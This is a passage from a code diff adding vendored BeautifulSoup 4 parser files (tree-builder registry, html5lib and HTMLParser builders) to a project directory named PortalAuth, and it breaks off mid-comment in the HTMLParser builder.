def handle_data(self, data):
|
||||
self.current_data.append(data)
|
||||
|
||||
def decode(self, pretty_print=False,
|
||||
eventual_encoding=DEFAULT_OUTPUT_ENCODING,
|
||||
formatter="minimal"):
|
||||
"""Returns a string or Unicode representation of this document.
|
||||
To get Unicode, pass None for encoding."""
|
||||
|
||||
if self.is_xml:
|
||||
# Print the XML declaration
|
||||
encoding_part = ''
|
||||
if eventual_encoding != None:
|
||||
encoding_part = ' encoding="%s"' % eventual_encoding
|
||||
prefix = u'<?xml version="1.0"%s?>\n' % encoding_part
|
||||
else:
|
||||
prefix = u''
|
||||
if not pretty_print:
|
||||
indent_level = None
|
||||
else:
|
||||
indent_level = 0
|
||||
return prefix + super(BeautifulSoup, self).decode(
|
||||
indent_level, eventual_encoding, formatter)
|
||||
|
||||
# Alias to make it easier to type import: 'from bs4 import _soup'
|
||||
_s = BeautifulSoup
|
||||
_soup = BeautifulSoup
|
||||
|
||||
class BeautifulStoneSoup(BeautifulSoup):
|
||||
"""Deprecated interface to an XML parser."""
|
||||
|
||||
def __init__(self, *args, **kwargs):
|
||||
kwargs['features'] = 'xml'
|
||||
warnings.warn(
|
||||
'The BeautifulStoneSoup class is deprecated. Instead of using '
|
||||
'it, pass features="xml" into the BeautifulSoup constructor.')
|
||||
super(BeautifulStoneSoup, self).__init__(*args, **kwargs)
|
||||
|
||||
|
||||
class StopParsing(Exception):
|
||||
pass
|
||||
|
||||
class FeatureNotFound(ValueError):
|
||||
pass
|
||||
|
||||
|
||||
#By default, act as an HTML pretty-printer.
|
||||
if __name__ == '__main__':
|
||||
import sys
|
||||
soup = BeautifulSoup(sys.stdin)
|
||||
print soup.prettify()
|
||||
324
PortalAuth/includes/scripts/libs/bs4/builder/__init__.py
Executable file
324
PortalAuth/includes/scripts/libs/bs4/builder/__init__.py
Executable file
@@ -0,0 +1,324 @@
|
||||
from collections import defaultdict
|
||||
import itertools
|
||||
import sys
|
||||
from bs4.element import (
|
||||
CharsetMetaAttributeValue,
|
||||
ContentMetaAttributeValue,
|
||||
whitespace_re
|
||||
)
|
||||
|
||||
__all__ = [
|
||||
'HTMLTreeBuilder',
|
||||
'SAXTreeBuilder',
|
||||
'TreeBuilder',
|
||||
'TreeBuilderRegistry',
|
||||
]
|
||||
|
||||
# Some useful features for a TreeBuilder to have.
|
||||
FAST = 'fast'
|
||||
PERMISSIVE = 'permissive'
|
||||
STRICT = 'strict'
|
||||
XML = 'xml'
|
||||
HTML = 'html'
|
||||
HTML_5 = 'html5'
|
||||
|
||||
|
||||
class TreeBuilderRegistry(object):
|
||||
|
||||
def __init__(self):
|
||||
self.builders_for_feature = defaultdict(list)
|
||||
self.builders = []
|
||||
|
||||
def register(self, treebuilder_class):
|
||||
"""Register a treebuilder based on its advertised features."""
|
||||
for feature in treebuilder_class.features:
|
||||
self.builders_for_feature[feature].insert(0, treebuilder_class)
|
||||
self.builders.insert(0, treebuilder_class)
|
||||
|
||||
def lookup(self, *features):
|
||||
if len(self.builders) == 0:
|
||||
# There are no builders at all.
|
||||
return None
|
||||
|
||||
if len(features) == 0:
|
||||
# They didn't ask for any features. Give them the most
|
||||
# recently registered builder.
|
||||
return self.builders[0]
|
||||
|
||||
# Go down the list of features in order, and eliminate any builders
|
||||
# that don't match every feature.
|
||||
features = list(features)
|
||||
features.reverse()
|
||||
candidates = None
|
||||
candidate_set = None
|
||||
while len(features) > 0:
|
||||
feature = features.pop()
|
||||
we_have_the_feature = self.builders_for_feature.get(feature, [])
|
||||
if len(we_have_the_feature) > 0:
|
||||
if candidates is None:
|
||||
candidates = we_have_the_feature
|
||||
candidate_set = set(candidates)
|
||||
else:
|
||||
# Eliminate any candidates that don't have this feature.
|
||||
candidate_set = candidate_set.intersection(
|
||||
set(we_have_the_feature))
|
||||
|
||||
# The only valid candidates are the ones in candidate_set.
|
||||
# Go through the original list of candidates and pick the first one
|
||||
# that's in candidate_set.
|
||||
if candidate_set is None:
|
||||
return None
|
||||
for candidate in candidates:
|
||||
if candidate in candidate_set:
|
||||
return candidate
|
||||
return None
|
||||
|
||||
# The BeautifulSoup class will take feature lists from developers and use them
|
||||
# to look up builders in this registry.
|
||||
builder_registry = TreeBuilderRegistry()
|
||||
|
||||
class TreeBuilder(object):
|
||||
"""Turn a document into a Beautiful Soup object tree."""
|
||||
|
||||
NAME = "[Unknown tree builder]"
|
||||
ALTERNATE_NAMES = []
|
||||
features = []
|
||||
|
||||
is_xml = False
|
||||
picklable = False
|
||||
preserve_whitespace_tags = set()
|
||||
empty_element_tags = None # A tag will be considered an empty-element
|
||||
# tag when and only when it has no contents.
|
||||
|
||||
# A value for these tag/attribute combinations is a space- or
|
||||
# comma-separated list of CDATA, rather than a single CDATA.
|
||||
cdata_list_attributes = {}
|
||||
|
||||
|
||||
def __init__(self):
|
||||
self.soup = None
|
||||
|
||||
def reset(self):
|
||||
pass
|
||||
|
||||
def can_be_empty_element(self, tag_name):
|
||||
"""Might a tag with this name be an empty-element tag?
|
||||
|
||||
The final markup may or may not actually present this tag as
|
||||
self-closing.
|
||||
|
||||
For instance: an HTMLBuilder does not consider a <p> tag to be
|
||||
an empty-element tag (it's not in
|
||||
HTMLBuilder.empty_element_tags). This means an empty <p> tag
|
||||
will be presented as "<p></p>", not "<p />".
|
||||
|
||||
The default implementation has no opinion about which tags are
|
||||
empty-element tags, so a tag will be presented as an
|
||||
empty-element tag if and only if it has no contents.
|
||||
"<foo></foo>" will become "<foo />", and "<foo>bar</foo>" will
|
||||
be left alone.
|
||||
"""
|
||||
if self.empty_element_tags is None:
|
||||
return True
|
||||
return tag_name in self.empty_element_tags
|
||||
|
||||
def feed(self, markup):
|
||||
raise NotImplementedError()
|
||||
|
||||
def prepare_markup(self, markup, user_specified_encoding=None,
|
||||
document_declared_encoding=None):
|
||||
return markup, None, None, False
|
||||
|
||||
def test_fragment_to_document(self, fragment):
|
||||
"""Wrap an HTML fragment to make it look like a document.
|
||||
|
||||
Different parsers do this differently. For instance, lxml
|
||||
introduces an empty <head> tag, and html5lib
|
||||
doesn't. Abstracting this away lets us write simple tests
|
||||
which run HTML fragments through the parser and compare the
|
||||
results against other HTML fragments.
|
||||
|
||||
This method should not be used outside of tests.
|
||||
"""
|
||||
return fragment
|
||||
|
||||
def set_up_substitutions(self, tag):
|
||||
return False
|
||||
|
||||
def _replace_cdata_list_attribute_values(self, tag_name, attrs):
|
||||
"""Replaces class="foo bar" with class=["foo", "bar"]
|
||||
|
||||
Modifies its input in place.
|
||||
"""
|
||||
if not attrs:
|
||||
return attrs
|
||||
if self.cdata_list_attributes:
|
||||
universal = self.cdata_list_attributes.get('*', [])
|
||||
tag_specific = self.cdata_list_attributes.get(
|
||||
tag_name.lower(), None)
|
||||
for attr in attrs.keys():
|
||||
if attr in universal or (tag_specific and attr in tag_specific):
|
||||
# We have a "class"-type attribute whose string
|
||||
# value is a whitespace-separated list of
|
||||
# values. Split it into a list.
|
||||
value = attrs[attr]
|
||||
if isinstance(value, basestring):
|
||||
values = whitespace_re.split(value)
|
||||
else:
|
||||
# html5lib sometimes calls setAttributes twice
|
||||
# for the same tag when rearranging the parse
|
||||
# tree. On the second call the attribute value
|
||||
# here is already a list. If this happens,
|
||||
# leave the value alone rather than trying to
|
||||
# split it again.
|
||||
values = value
|
||||
attrs[attr] = values
|
||||
return attrs
|
||||
|
||||
class SAXTreeBuilder(TreeBuilder):
|
||||
"""A Beautiful Soup treebuilder that listens for SAX events."""
|
||||
|
||||
def feed(self, markup):
|
||||
raise NotImplementedError()
|
||||
|
||||
def close(self):
|
||||
pass
|
||||
|
||||
def startElement(self, name, attrs):
|
||||
attrs = dict((key[1], value) for key, value in list(attrs.items()))
|
||||
#print "Start %s, %r" % (name, attrs)
|
||||
self.soup.handle_starttag(name, attrs)
|
||||
|
||||
def endElement(self, name):
|
||||
#print "End %s" % name
|
||||
self.soup.handle_endtag(name)
|
||||
|
||||
def startElementNS(self, nsTuple, nodeName, attrs):
|
||||
# Throw away (ns, nodeName) for now.
|
||||
self.startElement(nodeName, attrs)
|
||||
|
||||
def endElementNS(self, nsTuple, nodeName):
|
||||
# Throw away (ns, nodeName) for now.
|
||||
self.endElement(nodeName)
|
||||
#handler.endElementNS((ns, node.nodeName), node.nodeName)
|
||||
|
||||
def startPrefixMapping(self, prefix, nodeValue):
|
||||
# Ignore the prefix for now.
|
||||
pass
|
||||
|
||||
def endPrefixMapping(self, prefix):
|
||||
# Ignore the prefix for now.
|
||||
# handler.endPrefixMapping(prefix)
|
||||
pass
|
||||
|
||||
def characters(self, content):
|
||||
self.soup.handle_data(content)
|
||||
|
||||
def startDocument(self):
|
||||
pass
|
||||
|
||||
def endDocument(self):
|
||||
pass
|
||||
|
||||
|
||||
class HTMLTreeBuilder(TreeBuilder):
|
||||
"""This TreeBuilder knows facts about HTML.
|
||||
|
||||
Such as which tags are empty-element tags.
|
||||
"""
|
||||
|
||||
preserve_whitespace_tags = set(['pre', 'textarea'])
|
||||
empty_element_tags = set(['br' , 'hr', 'input', 'img', 'meta',
|
||||
'spacer', 'link', 'frame', 'base'])
|
||||
|
||||
# The HTML standard defines these attributes as containing a
|
||||
# space-separated list of values, not a single value. That is,
|
||||
# class="foo bar" means that the 'class' attribute has two values,
|
||||
# 'foo' and 'bar', not the single value 'foo bar'. When we
|
||||
# encounter one of these attributes, we will parse its value into
|
||||
# a list of values if possible. Upon output, the list will be
|
||||
# converted back into a string.
|
||||
cdata_list_attributes = {
|
||||
"*" : ['class', 'accesskey', 'dropzone'],
|
||||
"a" : ['rel', 'rev'],
|
||||
"link" : ['rel', 'rev'],
|
||||
"td" : ["headers"],
|
||||
"th" : ["headers"],
|
||||
"td" : ["headers"],
|
||||
"form" : ["accept-charset"],
|
||||
"object" : ["archive"],
|
||||
|
||||
# These are HTML5 specific, as are *.accesskey and *.dropzone above.
|
||||
"area" : ["rel"],
|
||||
"icon" : ["sizes"],
|
||||
"iframe" : ["sandbox"],
|
||||
"output" : ["for"],
|
||||
}
|
||||
|
||||
def set_up_substitutions(self, tag):
|
||||
# We are only interested in <meta> tags
|
||||
if tag.name != 'meta':
|
||||
return False
|
||||
|
||||
http_equiv = tag.get('http-equiv')
|
||||
content = tag.get('content')
|
||||
charset = tag.get('charset')
|
||||
|
||||
# We are interested in <meta> tags that say what encoding the
|
||||
# document was originally in. This means HTML 5-style <meta>
|
||||
# tags that provide the "charset" attribute. It also means
|
||||
# HTML 4-style <meta> tags that provide the "content"
|
||||
# attribute and have "http-equiv" set to "content-type".
|
||||
#
|
||||
# In both cases we will replace the value of the appropriate
|
||||
# attribute with a standin object that can take on any
|
||||
# encoding.
|
||||
meta_encoding = None
|
||||
if charset is not None:
|
||||
# HTML 5 style:
|
||||
# <meta charset="utf8">
|
||||
meta_encoding = charset
|
||||
tag['charset'] = CharsetMetaAttributeValue(charset)
|
||||
|
||||
elif (content is not None and http_equiv is not None
|
||||
and http_equiv.lower() == 'content-type'):
|
||||
# HTML 4 style:
|
||||
# <meta http-equiv="content-type" content="text/html; charset=utf8">
|
||||
tag['content'] = ContentMetaAttributeValue(content)
|
||||
|
||||
return (meta_encoding is not None)
|
||||
|
||||
def register_treebuilders_from(module):
|
||||
"""Copy TreeBuilders from the given module into this module."""
|
||||
# I'm fairly sure this is not the best way to do this.
|
||||
this_module = sys.modules['bs4.builder']
|
||||
for name in module.__all__:
|
||||
obj = getattr(module, name)
|
||||
|
||||
if issubclass(obj, TreeBuilder):
|
||||
setattr(this_module, name, obj)
|
||||
this_module.__all__.append(name)
|
||||
# Register the builder while we're at it.
|
||||
this_module.builder_registry.register(obj)
|
||||
|
||||
class ParserRejectedMarkup(Exception):
|
||||
pass
|
||||
|
||||
# Builders are registered in reverse order of priority, so that custom
|
||||
# builder registrations will take precedence. In general, we want lxml
|
||||
# to take precedence over html5lib, because it's faster. And we only
|
||||
# want to use HTMLParser as a last result.
|
||||
from . import _htmlparser
|
||||
register_treebuilders_from(_htmlparser)
|
||||
try:
|
||||
from . import _html5lib
|
||||
register_treebuilders_from(_html5lib)
|
||||
except ImportError:
|
||||
# They don't have html5lib installed.
|
||||
pass
|
||||
try:
|
||||
from . import _lxml
|
||||
register_treebuilders_from(_lxml)
|
||||
except ImportError:
|
||||
# They don't have lxml installed.
|
||||
pass
|
||||
329
PortalAuth/includes/scripts/libs/bs4/builder/_html5lib.py
Executable file
329
PortalAuth/includes/scripts/libs/bs4/builder/_html5lib.py
Executable file
@@ -0,0 +1,329 @@
|
||||
__all__ = [
|
||||
'HTML5TreeBuilder',
|
||||
]
|
||||
|
||||
from pdb import set_trace
|
||||
import warnings
|
||||
from bs4.builder import (
|
||||
PERMISSIVE,
|
||||
HTML,
|
||||
HTML_5,
|
||||
HTMLTreeBuilder,
|
||||
)
|
||||
from bs4.element import (
|
||||
NamespacedAttribute,
|
||||
whitespace_re,
|
||||
)
|
||||
import html5lib
|
||||
from html5lib.constants import namespaces
|
||||
from bs4.element import (
|
||||
Comment,
|
||||
Doctype,
|
||||
NavigableString,
|
||||
Tag,
|
||||
)
|
||||
|
||||
class HTML5TreeBuilder(HTMLTreeBuilder):
|
||||
"""Use html5lib to build a tree."""
|
||||
|
||||
NAME = "html5lib"
|
||||
|
||||
features = [NAME, PERMISSIVE, HTML_5, HTML]
|
||||
|
||||
def prepare_markup(self, markup, user_specified_encoding,
|
||||
document_declared_encoding=None, exclude_encodings=None):
|
||||
# Store the user-specified encoding for use later on.
|
||||
self.user_specified_encoding = user_specified_encoding
|
||||
|
||||
# document_declared_encoding and exclude_encodings aren't used
|
||||
# ATM because the html5lib TreeBuilder doesn't use
|
||||
# UnicodeDammit.
|
||||
if exclude_encodings:
|
||||
warnings.warn("You provided a value for exclude_encoding, but the html5lib tree builder doesn't support exclude_encoding.")
|
||||
yield (markup, None, None, False)
|
||||
|
||||
# These methods are defined by Beautiful Soup.
|
||||
def feed(self, markup):
|
||||
if self.soup.parse_only is not None:
|
||||
warnings.warn("You provided a value for parse_only, but the html5lib tree builder doesn't support parse_only. The entire document will be parsed.")
|
||||
parser = html5lib.HTMLParser(tree=self.create_treebuilder)
|
||||
doc = parser.parse(markup, encoding=self.user_specified_encoding)
|
||||
|
||||
# Set the character encoding detected by the tokenizer.
|
||||
if isinstance(markup, unicode):
|
||||
# We need to special-case this because html5lib sets
|
||||
# charEncoding to UTF-8 if it gets Unicode input.
|
||||
doc.original_encoding = None
|
||||
else:
|
||||
doc.original_encoding = parser.tokenizer.stream.charEncoding[0]
|
||||
|
||||
def create_treebuilder(self, namespaceHTMLElements):
|
||||
self.underlying_builder = TreeBuilderForHtml5lib(
|
||||
self.soup, namespaceHTMLElements)
|
||||
return self.underlying_builder
|
||||
|
||||
def test_fragment_to_document(self, fragment):
|
||||
"""See `TreeBuilder`."""
|
||||
return u'<html><head></head><body>%s</body></html>' % fragment
|
||||
|
||||
|
||||
class TreeBuilderForHtml5lib(html5lib.treebuilders._base.TreeBuilder):
|
||||
|
||||
def __init__(self, soup, namespaceHTMLElements):
|
||||
self.soup = soup
|
||||
super(TreeBuilderForHtml5lib, self).__init__(namespaceHTMLElements)
|
||||
|
||||
def documentClass(self):
|
||||
self.soup.reset()
|
||||
return Element(self.soup, self.soup, None)
|
||||
|
||||
def insertDoctype(self, token):
|
||||
name = token["name"]
|
||||
publicId = token["publicId"]
|
||||
systemId = token["systemId"]
|
||||
|
||||
doctype = Doctype.for_name_and_ids(name, publicId, systemId)
|
||||
self.soup.object_was_parsed(doctype)
|
||||
|
||||
def elementClass(self, name, namespace):
|
||||
tag = self.soup.new_tag(name, namespace)
|
||||
return Element(tag, self.soup, namespace)
|
||||
|
||||
def commentClass(self, data):
|
||||
return TextNode(Comment(data), self.soup)
|
||||
|
||||
def fragmentClass(self):
|
||||
self.soup = BeautifulSoup("")
|
||||
self.soup.name = "[document_fragment]"
|
||||
return Element(self.soup, self.soup, None)
|
||||
|
||||
def appendChild(self, node):
|
||||
# XXX This code is not covered by the BS4 tests.
|
||||
self.soup.append(node.element)
|
||||
|
||||
def getDocument(self):
|
||||
return self.soup
|
||||
|
||||
def getFragment(self):
|
||||
return html5lib.treebuilders._base.TreeBuilder.getFragment(self).element
|
||||
|
||||
class AttrList(object):
|
||||
def __init__(self, element):
|
||||
self.element = element
|
||||
self.attrs = dict(self.element.attrs)
|
||||
def __iter__(self):
|
||||
return list(self.attrs.items()).__iter__()
|
||||
def __setitem__(self, name, value):
|
||||
# If this attribute is a multi-valued attribute for this element,
|
||||
# turn its value into a list.
|
||||
list_attr = HTML5TreeBuilder.cdata_list_attributes
|
||||
if (name in list_attr['*']
|
||||
or (self.element.name in list_attr
|
||||
and name in list_attr[self.element.name])):
|
||||
value = whitespace_re.split(value)
|
||||
self.element[name] = value
|
||||
def items(self):
|
||||
return list(self.attrs.items())
|
||||
def keys(self):
|
||||
return list(self.attrs.keys())
|
||||
def __len__(self):
|
||||
return len(self.attrs)
|
||||
def __getitem__(self, name):
|
||||
return self.attrs[name]
|
||||
def __contains__(self, name):
|
||||
return name in list(self.attrs.keys())
|
||||
|
||||
|
||||
class Element(html5lib.treebuilders._base.Node):
|
||||
def __init__(self, element, soup, namespace):
|
||||
html5lib.treebuilders._base.Node.__init__(self, element.name)
|
||||
self.element = element
|
||||
self.soup = soup
|
||||
self.namespace = namespace
|
||||
|
||||
def appendChild(self, node):
|
||||
string_child = child = None
|
||||
if isinstance(node, basestring):
|
||||
# Some other piece of code decided to pass in a string
|
||||
# instead of creating a TextElement object to contain the
|
||||
# string.
|
||||
string_child = child = node
|
||||
elif isinstance(node, Tag):
|
||||
# Some other piece of code decided to pass in a Tag
|
||||
# instead of creating an Element object to contain the
|
||||
# Tag.
|
||||
child = node
|
||||
elif node.element.__class__ == NavigableString:
|
||||
string_child = child = node.element
|
||||
else:
|
||||
child = node.element
|
||||
|
||||
if not isinstance(child, basestring) and child.parent is not None:
|
||||
node.element.extract()
|
||||
|
||||
if (string_child and self.element.contents
|
||||
and self.element.contents[-1].__class__ == NavigableString):
|
||||
# We are appending a string onto another string.
|
||||
# TODO This has O(n^2) performance, for input like
|
||||
# "a</a>a</a>a</a>..."
|
||||
old_element = self.element.contents[-1]
|
||||
new_element = self.soup.new_string(old_element + string_child)
|
||||
old_element.replace_with(new_element)
|
||||
self.soup._most_recent_element = new_element
|
||||
else:
|
||||
if isinstance(node, basestring):
|
||||
# Create a brand new NavigableString from this string.
|
||||
child = self.soup.new_string(node)
|
||||
|
||||
# Tell Beautiful Soup to act as if it parsed this element
|
||||
# immediately after the parent's last descendant. (Or
|
||||
# immediately after the parent, if it has no children.)
|
||||
if self.element.contents:
|
||||
most_recent_element = self.element._last_descendant(False)
|
||||
elif self.element.next_element is not None:
|
||||
# Something from further ahead in the parse tree is
|
||||
# being inserted into this earlier element. This is
|
||||
# very annoying because it means an expensive search
|
||||
# for the last element in the tree.
|
||||
most_recent_element = self.soup._last_descendant()
|
||||
else:
|
||||
most_recent_element = self.element
|
||||
|
||||
self.soup.object_was_parsed(
|
||||
child, parent=self.element,
|
||||
most_recent_element=most_recent_element)
|
||||
|
||||
def getAttributes(self):
|
||||
return AttrList(self.element)
|
||||
|
||||
def setAttributes(self, attributes):
|
||||
|
||||
if attributes is not None and len(attributes) > 0:
|
||||
|
||||
converted_attributes = []
|
||||
for name, value in list(attributes.items()):
|
||||
if isinstance(name, tuple):
|
||||
new_name = NamespacedAttribute(*name)
|
||||
del attributes[name]
|
||||
attributes[new_name] = value
|
||||
|
||||
self.soup.builder._replace_cdata_list_attribute_values(
|
||||
self.name, attributes)
|
||||
for name, value in attributes.items():
|
||||
self.element[name] = value
|
||||
|
||||
# The attributes may contain variables that need substitution.
|
||||
# Call set_up_substitutions manually.
|
||||
#
|
||||
# The Tag constructor called this method when the Tag was created,
|
||||
# but we just set/changed the attributes, so call it again.
|
||||
self.soup.builder.set_up_substitutions(self.element)
|
||||
attributes = property(getAttributes, setAttributes)
|
||||
|
||||
def insertText(self, data, insertBefore=None):
|
||||
if insertBefore:
|
||||
text = TextNode(self.soup.new_string(data), self.soup)
|
||||
self.insertBefore(data, insertBefore)
|
||||
else:
|
||||
self.appendChild(data)
|
||||
|
||||
def insertBefore(self, node, refNode):
|
||||
index = self.element.index(refNode.element)
|
||||
if (node.element.__class__ == NavigableString and self.element.contents
|
||||
and self.element.contents[index-1].__class__ == NavigableString):
|
||||
# (See comments in appendChild)
|
||||
old_node = self.element.contents[index-1]
|
||||
new_str = self.soup.new_string(old_node + node.element)
|
||||
old_node.replace_with(new_str)
|
||||
else:
|
||||
self.element.insert(index, node.element)
|
||||
node.parent = self
|
||||
|
||||
def removeChild(self, node):
|
||||
node.element.extract()
|
||||
|
||||
def reparentChildren(self, new_parent):
|
||||
"""Move all of this tag's children into another tag."""
|
||||
# print "MOVE", self.element.contents
|
||||
# print "FROM", self.element
|
||||
# print "TO", new_parent.element
|
||||
element = self.element
|
||||
new_parent_element = new_parent.element
|
||||
# Determine what this tag's next_element will be once all the children
|
||||
# are removed.
|
||||
final_next_element = element.next_sibling
|
||||
|
||||
new_parents_last_descendant = new_parent_element._last_descendant(False, False)
|
||||
if len(new_parent_element.contents) > 0:
|
||||
# The new parent already contains children. We will be
|
||||
# appending this tag's children to the end.
|
||||
new_parents_last_child = new_parent_element.contents[-1]
|
||||
new_parents_last_descendant_next_element = new_parents_last_descendant.next_element
|
||||
else:
|
||||
# The new parent contains no children.
|
||||
new_parents_last_child = None
|
||||
new_parents_last_descendant_next_element = new_parent_element.next_element
|
||||
|
||||
to_append = element.contents
|
||||
append_after = new_parent_element.contents
|
||||
if len(to_append) > 0:
|
||||
# Set the first child's previous_element and previous_sibling
|
||||
# to elements within the new parent
|
||||
first_child = to_append[0]
|
||||
if new_parents_last_descendant:
|
||||
first_child.previous_element = new_parents_last_descendant
|
||||
else:
|
||||
first_child.previous_element = new_parent_element
|
||||
first_child.previous_sibling = new_parents_last_child
|
||||
if new_parents_last_descendant:
|
||||
new_parents_last_descendant.next_element = first_child
|
||||
else:
|
||||
new_parent_element.next_element = first_child
|
||||
if new_parents_last_child:
|
||||
new_parents_last_child.next_sibling = first_child
|
||||
|
||||
# Fix the last child's next_element and next_sibling
|
||||
last_child = to_append[-1]
|
||||
last_child.next_element = new_parents_last_descendant_next_element
|
||||
if new_parents_last_descendant_next_element:
|
||||
new_parents_last_descendant_next_element.previous_element = last_child
|
||||
last_child.next_sibling = None
|
||||
|
||||
for child in to_append:
|
||||
child.parent = new_parent_element
|
||||
new_parent_element.contents.append(child)
|
||||
|
||||
# Now that this element has no children, change its .next_element.
|
||||
element.contents = []
|
||||
element.next_element = final_next_element
|
||||
|
||||
# print "DONE WITH MOVE"
|
||||
# print "FROM", self.element
|
||||
# print "TO", new_parent_element
|
||||
|
||||
def cloneNode(self):
|
||||
tag = self.soup.new_tag(self.element.name, self.namespace)
|
||||
node = Element(tag, self.soup, self.namespace)
|
||||
for key,value in self.attributes:
|
||||
node.attributes[key] = value
|
||||
return node
|
||||
|
||||
def hasContent(self):
|
||||
return self.element.contents
|
||||
|
||||
def getNameTuple(self):
|
||||
if self.namespace == None:
|
||||
return namespaces["html"], self.name
|
||||
else:
|
||||
return self.namespace, self.name
|
||||
|
||||
nameTuple = property(getNameTuple)
|
||||
|
||||
class TextNode(Element):
|
||||
def __init__(self, element, soup):
|
||||
html5lib.treebuilders._base.Node.__init__(self, None)
|
||||
self.element = element
|
||||
self.soup = soup
|
||||
|
||||
def cloneNode(self):
|
||||
raise NotImplementedError
|
||||
262
PortalAuth/includes/scripts/libs/bs4/builder/_htmlparser.py
Executable file
262
PortalAuth/includes/scripts/libs/bs4/builder/_htmlparser.py
Executable file
@@ -0,0 +1,262 @@
|
||||
"""Use the HTMLParser library to parse HTML files that aren't too bad."""
|
||||
|
||||
__all__ = [
|
||||
'HTMLParserTreeBuilder',
|
||||
]
|
||||
|
||||
from HTMLParser import HTMLParser
|
||||
|
||||
try:
|
||||
from HTMLParser import HTMLParseError
|
||||
except ImportError, e:
|
||||
# HTMLParseError is removed in Python 3.5. Since it can never be
|
||||
# thrown in 3.5, we can just define our own class as a placeholder.
|
||||
class HTMLParseError(Exception):
|
||||
pass
|
||||
|
||||
import sys
|
||||
import warnings
|
||||
|
||||
# Starting in Python 3.2, the HTMLParser constructor takes a 'strict'
|
||||
# argument, which we'd like to set to False. Unfortunately,
|
||||
# http://bugs.python.org/issue13273 makes strict=True a better bet
|
||||
# before Python 3.2.3.
|
||||
#
|
||||
# At the end of this file, we monkeypatch HTMLParser so that
|
||||
# strict=True works well on Python 3.2.2.
|
||||
major, minor, release = sys.version_info[:3]
|
||||
CONSTRUCTOR_TAKES_STRICT = major == 3 and minor == 2 and release >= 3
|
||||
CONSTRUCTOR_STRICT_IS_DEPRECATED = major == 3 and minor == 3
|
||||
CONSTRUCTOR_TAKES_CONVERT_CHARREFS = major == 3 and minor >= 4
|
||||
|
||||
|
||||
from bs4.element import (
|
||||
CData,
|
||||
Comment,
|
||||
Declaration,
|
||||
Doctype,
|
||||
ProcessingInstruction,
|
||||
)
|
||||
from bs4.dammit import EntitySubstitution, UnicodeDammit
|
||||
|
||||
from bs4.builder import (
|
||||
HTML,
|
||||
HTMLTreeBuilder,
|
||||
STRICT,
|
||||
)
|
||||
|
||||
|
||||
HTMLPARSER = 'html.parser'
|
||||
|
||||
class BeautifulSoupHTMLParser(HTMLParser):
|
||||
def handle_starttag(self, name, attrs):
|
||||
# XXX namespace
|
||||
attr_dict = {}
|
||||
for key, value in attrs:
|
||||
# Change None attribute values to the empty string
|
||||
# for consistency with the other tree builders.
|
||||
if value is None:
|
||||
value = ''
|
||||
attr_dict[key] = value
|
||||
attrvalue = '""'
|
||||
self.soup.handle_starttag(name, None, None, attr_dict)
|
||||
|
||||
def handle_endtag(self, name):
|
||||
self.soup.handle_endtag(name)
|
||||
|
||||
def handle_data(self, data):
|
||||
self.soup.handle_data(data)
|
||||
|
||||
def handle_charref(self, name):
|
||||
# XXX workaround for a bug in HTMLParser. Remove this once
|
||||
# it's fixed in all supported versions.
|
||||
# http://bugs.python.org/issue13633
|
||||
if name.startswith('x'):
|
||||
real_name = int(name.lstrip('x'), 16)
|
||||
elif name.startswith('X'):
|
||||
real_name = int(name.lstrip('X'), 16)
|
||||
else:
|
||||
real_name = int(name)
|
||||
|
||||
try:
|
||||
data = unichr(real_name)
|
||||
except (ValueError, OverflowError), e:
|
||||
data = u"\N{REPLACEMENT CHARACTER}"
|
||||
|
||||
self.handle_data(data)
|
||||
|
||||
def handle_entityref(self, name):
|
||||
character = EntitySubstitution.HTML_ENTITY_TO_CHARACTER.get(name)
|
||||
if character is not None:
|
||||
data = character
|
||||
else:
|
||||
data = "&%s;" % name
|
||||
self.handle_data(data)
|
||||
|
||||
def handle_comment(self, data):
|
||||
self.soup.endData()
|
||||
self.soup.handle_data(data)
|
||||
self.soup.endData(Comment)
|
||||
|
||||
def handle_decl(self, data):
|
||||
self.soup.endData()
|
||||
if data.startswith("DOCTYPE "):
|
||||
data = data[len("DOCTYPE "):]
|
||||
elif data == 'DOCTYPE':
|
||||
# i.e. "<!DOCTYPE>"
|
||||
data = ''
|
||||
self.soup.handle_data(data)
|
||||
self.soup.endData(Doctype)
|
||||
|
||||
def unknown_decl(self, data):
|
||||
if data.upper().startswith('CDATA['):
|
||||
cls = CData
|
||||
data = data[len('CDATA['):]
|
||||
else:
|
||||
cls = Declaration
|
||||
self.soup.endData()
|
||||
self.soup.handle_data(data)
|
||||
self.soup.endData(cls)
|
||||
|
||||
def handle_pi(self, data):
|
||||
self.soup.endData()
|
||||
self.soup.handle_data(data)
|
||||
self.soup.endData(ProcessingInstruction)
|
||||
|
||||
|
||||
class HTMLParserTreeBuilder(HTMLTreeBuilder):
|
||||
|
||||
is_xml = False
|
||||
picklable = True
|
||||
NAME = HTMLPARSER
|
||||
features = [NAME, HTML, STRICT]
|
||||
|
||||
def __init__(self, *args, **kwargs):
|
||||
if CONSTRUCTOR_TAKES_STRICT and not CONSTRUCTOR_STRICT_IS_DEPRECATED:
|
||||
kwargs['strict'] = False
|
||||
if CONSTRUCTOR_TAKES_CONVERT_CHARREFS:
|
||||
kwargs['convert_charrefs'] = False
|
||||
self.parser_args = (args, kwargs)
|
||||
|
||||
def prepare_markup(self, markup, user_specified_encoding=None,
|
||||
document_declared_encoding=None, exclude_encodings=None):
|
||||
"""
|
||||
:return: A 4-tuple (markup, original encoding, encoding
|
||||
declared within markup, whether any characters had to be
|
||||
replaced with REPLACEMENT CHARACTER).
|
||||
"""
|
||||
if isinstance(markup, unicode):
|
||||
yield (markup, None, None, False)
|
||||
return
|
||||
|
||||
try_encodings = [user_specified_encoding, document_declared_encoding]
|
||||
dammit = UnicodeDammit(markup, try_encodings, is_html=True,
|
||||
exclude_encodings=exclude_encodings)
|
||||
yield (dammit.markup, dammit.original_encoding,
|
||||
dammit.declared_html_encoding,
|
||||
dammit.contains_replacement_characters)
|
||||
|
||||
def feed(self, markup):
|
||||
args, kwargs = self.parser_args
|
||||
parser = BeautifulSoupHTMLParser(*args, **kwargs)
|
||||
parser.soup = self.soup
|
||||
try:
|
||||
parser.feed(markup)
|
||||
except HTMLParseError, e:
|
||||
warnings.warn(RuntimeWarning(
|
||||
"Python's built-in HTMLParser cannot parse the given document. This is not a bug in Beautiful Soup. The best solution is to install an external parser (lxml or html5lib), and use Beautiful Soup with that parser. See http://www.crummy.com/software/BeautifulSoup/bs4/doc/#installing-a-parser for help."))
|
||||
raise e
|
||||
|
||||
# Patch 3.2 versions of HTMLParser earlier than 3.2.3 to use some
|
||||
# 3.2.3 code. This ensures they don't treat markup like <p></p> as a
|
||||
# string.
|
||||
#
|
||||
